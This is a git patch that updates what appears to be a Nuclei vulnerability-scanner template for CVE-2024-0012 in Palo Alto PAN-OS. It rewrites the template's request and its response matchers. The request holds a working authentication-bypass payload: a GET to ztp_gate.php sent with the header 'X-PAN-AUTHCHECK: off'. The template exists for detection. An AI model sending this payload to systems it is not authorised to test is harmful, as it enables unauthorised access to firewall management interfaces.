From f1d108b59357d45eab9f0a4003c2aecf78f97806 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Nov 2024 10:09:50 +0530
Subject: [PATCH] added dsl & updated req type

---
 http/cves/2024/CVE-2024-0012.yaml | 38 ++++++++++++-------------------
 1 file changed, 14 insertions(+), 24 deletions(-)

diff --git a/http/cves/2024/CVE-2024-0012.yaml b/http/cves/2024/CVE-2024-0012.yaml
index 7753beae9f..53c6f6039f 100644
--- a/http/cves/2024/CVE-2024-0012.yaml
+++ b/http/cves/2024/CVE-2024-0012.yaml
@@ -19,6 +19,8 @@ info:
     epss-percentile: 0.85843
     cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
   metadata:
+    verified: true
+    max-request: 1
     vendor: paloaltonetworks
     product: pan-os
     fofa-query: icon_hash="-631559155"
@@ -28,29 +30,17 @@ info:
   tags: cve,cve2024,paloalto,globalprotect,kev
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/php/ztp_gate.php/.js.map"
-    headers:
-      X-PAN-AUTHCHECK: off
+  - raw:
+      - |
+        GET /php/ztp_gate.php/.js.map HTTP/1.1
+        Host: {{Hostname}}
+        X-PAN-AUTHCHECK: off
 
-    matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - "<title>Zero Touch Provisioning</title>"
-          - "Zero Touch Provisioning (ZTP)"
-
-      - type: word
-        part: body
-        words:
-          - "/scripts/cache/mainui.javascript"
-
-      - type: word
-        part: header
-        words:
-          - "PHPSESSID="
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
+          - 'contains(body, "/scripts/cache/mainui.javascript")'
+          - 'contains(header, "PHPSESSID=")'
+          - 'status_code == 200'
+        condition: and